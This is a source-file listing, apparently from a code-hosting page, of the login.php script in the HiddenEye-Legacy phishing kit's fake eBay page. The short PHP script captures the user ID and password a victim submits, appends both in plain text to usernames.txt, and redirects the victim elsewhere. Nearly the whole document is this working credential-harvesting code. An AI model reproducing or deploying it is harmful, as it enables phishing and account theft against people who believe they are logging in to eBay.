HiddenEye-Legacy/WebPages/ebay/login.php

7 lines
180 B
PHP
Raw Normal View History

2019-04-21 18:08:25 +08:00
<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['userid'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();